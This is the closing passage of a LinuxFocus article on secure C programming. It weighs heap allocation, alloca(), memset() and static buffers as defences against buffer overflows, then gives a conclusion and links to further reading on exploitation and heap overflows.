    return (result);
  }
</PRE>

These lines bloat the code and risks memory leaks, but we
must take advantage of these changes to modify the approach and avoid
imposing arbitrary length limits. Let's add you can't expect the same
result using the <CODE>alloca()</CODE>. The code looks similar but
alloca allocates the data in the process stack and that leads to the
same problem as automatic variables.
Initializing memory to zero using
<CODE>memset()</CODE> avoids a few problems with
uninitialized variables. Again, this doesn't correct the problem,
the exploit just becomes less trivial. Those wanting to carry on with
the subject can read the article about Heap overflows from w00w00.

<P>Last, let's say it's possible under some circumstances to
quickly get rid of security holes by adding the <CODE>static</CODE> keyword
before the buffer declaration. The compiler allocates this variable in the data
segment far from the process stack. It becomes impossible to get a
shell, but doesn't solve the problem of a DoS (Denial of Service) attack. Of course, this doesn't
work if the routine is called recursively. This "medicine" has to be
considered as a palliative, only used for eliminating a security hole
in an emergency without changing much of the code.</P>

<A NAME="190lfindex9">&nbsp;</A>
<H2>Conclusion</H2>



We hope this overview on buffer overflows helps you to program
more securely. Even if the exploit technique requires a good
understanding of the mechanism, the general principle is rather
accessible. On the other hand, the implementation of precautions is not
that difficult. Don't forget it's faster to make a program secure at
design time than to fix the faults later on. We'll confirm this principle in our next
article about <EM>format bugs</EM>.

<A NAME="190lfindex10">&nbsp;</A>
<H2>Links</H2>



<UL>
<LI>Christophe Blaess's page : <A href=
"http://perso.club-internet.fr/ccb/">perso.club-internet.fr/ccb/</A></LI>

<LI>Christophe Grenier's page : <A href=
"http://www.esiea.fr/public_html/Christophe.GRENIER/">www.esiea.fr/public_html/Christophe.GRENIER/</A></LI>

<LI>Fr&eacute;d&eacute;ric Raynal's page : <A href=
"http://www-rocq.inria.fr/~raynal/">www-rocq.inria.fr/~raynal/</A></LI>

<LI>Phrack Magazine : <A href=
"http://phrack.infonexus.com/">phrack.infonexus.com/</A>.</LI>

<LI>Heap overflow : <A href=
"http://www.w00w00.org/files/articles/heaptut.txt">www.w00w00.org/files/articles/heaptut.txt</A></LI>
</UL>




<!-- 2pdaIgnoreStart -->
<A NAME="talkback">&nbsp;</a>
<h2>Talkback form for this article</h2>
Every article has its own talkback page. On this page you can submit a comment or look at comments from other readers:
<center>
<table border="0"  CELLSPACING="2" CELLPADDING="1">
 <tr BGCOLOR="#C2C2C2"><td align=center>
  <table border="3"  CELLSPACING="2" CELLPADDING="1">
   <tr BGCOLOR="#C2C2C2"><td align=center>
    <A href="http://cgi.linuxfocus.org/cgi-bin/lftalkback?anum=190&lang=en"><b>&nbsp;talkback page&nbsp;</b></a>
   </td></tr></table>
</td></tr></table>
</center>

<HR size="2" noshade>
<!-- ARTICLE FOOT -->
<CENTER><TABLE WIDTH="95%">
<TR><TD ALIGN=CENTER BGCOLOR="#9999AA">
<A HREF="../../common/lfteam.html">Webpages maintained by the LinuxFocus Editor team</A>
<BR><FONT COLOR="#FFFFFF">&copy;  Fr&eacute;d&eacute;ric Raynal, Christophe Blaess, Christophe Grenier, <a href="../../common/copy.html">FDL</a> <BR><a href="http://www.linuxfocus.org">LinuxFocus.org</a></FONT>
<BR><a href="http://cgi.linuxfocus.org/cgi-bin/lfcomment?lang=en&article=article190.shtml" target="_TOP">Click here to report a fault or send a comment to LinuxFocus</A><BR></TD>
<TD BGCOLOR="#9999AA"><!-- TRANSLATION INFO -->
<font size=2>Translation information:</font><TABLE>
<tr><td><font size=2>fr</font></td>
    <td><font size=2>-&gt;</font></td>
    <td><font size=2>--</font></td>
    <td><font size=2><a href="mailto:pappy&#64;users.sourceforge.net,ccb@club-internet.fr,grenier@nef.esiea.fr"><FONT COLOR="#FFFFFF"> Fr&eacute;d&eacute;ric Raynal, Christophe Blaess, Christophe Grenier</FONT></a></font></td>
</tr>
<tr><td><font size=2>fr</font></td>
    <td><font size=2>-&gt;</font></td>
    <td><font size=2>en</font></td>
    <td><font size=2><a href="mailto:georges.t&#64;linuxfocus.org"><FONT COLOR="#FFFFFF">Georges Tarbouriech</FONT></a></font></td>
</tr>
<tr><td><font size=2>en</font></td>
    <td><font size=2>-&gt;</font></td>
    <td><font size=2>en</font></td>
    <td><font size=2><a href="mailto:sherm_pbody&#64;yahoo.com"><FONT COLOR="#FFFFFF">Lorne Bailey</FONT></a></font></td>
</tr>
</TABLE></TD>
</TR></TABLE></CENTER>
<p><font size=1>2001-05-01, generated by lfparser version 2.13</font></p>
<!-- 2pdaIgnoreStop -->
</BODY>
</HTML>